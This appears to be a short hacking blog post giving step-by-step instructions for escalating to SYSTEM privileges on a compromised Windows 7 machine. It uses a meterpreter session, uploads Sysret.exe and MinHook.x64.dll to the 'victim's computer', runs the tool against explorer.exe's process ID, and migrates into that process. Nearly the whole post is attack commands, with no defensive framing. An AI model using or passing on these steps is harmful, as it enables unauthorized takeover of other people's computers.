Step 1:CYBERATOR
Hack Win-7 and get the meterpreter shell. (As I demonstrated in the previous Post)
My current Privileges are:
Step 2:
Download the following Resources:
Sysret.exe
MinHook.x64.dll
Now Upload these files to the Victim's Computer using the following Command:
upload <path where Sysret.exe is kept> .
upload <path of MinHook.x64.dll> .
Step 3:
Inside meterpreter shell type "ls" to list all the ongoing process.
Note down the PID of explorer.exe. (1404 my this case)
Step 4:
Type "shell" to get into the command prompt of the victim's computer.
Then type the following command inside the command shell:
sysret.exe -pid 1404 <type the pid of explorer.exe as shown in your system...in my case its 1404>
Press "ctrl+c" to terminate channel.
Step 5:
Now Migrate to the infected process to get the System level privileges ie. to the pid of explorer.exe
Now type the following commands:
getprivs
getuid
Comments
Post a Comment